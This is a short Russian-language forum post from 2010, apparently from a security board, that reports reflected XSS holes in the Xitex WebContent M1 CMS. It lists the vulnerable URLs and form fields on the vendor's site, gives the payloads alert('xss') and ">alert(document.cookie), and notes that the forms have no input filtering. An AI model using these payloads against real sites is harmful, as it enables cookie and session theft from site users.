30.11.2010, 03:26
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Xitex WebContent M1 CMS
Платна
офф сайт: http://webcontent-m1.com/
Passive XSS
Код:
http://webcontent-m1.com/m1/en/buyonline/standard_vs_professional
В поле:
Sign up for free e-newsletter XSS
Please correct you e-mail address
E-mail: alert('xss')
____
Код:
http://webcontent-m1.com/m1/en/buyonline/trial_version
http://webcontent-m1.com/m1/en/contact_us
http://webcontent-m1.com/m1/en/buyonline/overview
http://webcontent-m1.com/m1/en/send_feedback
Нужно минимум 2 поля заполнить хсс кодом.
">alert(document.cookie)
также фильтра нету никакого т.е можно все заполнить кавычками.
|
|
|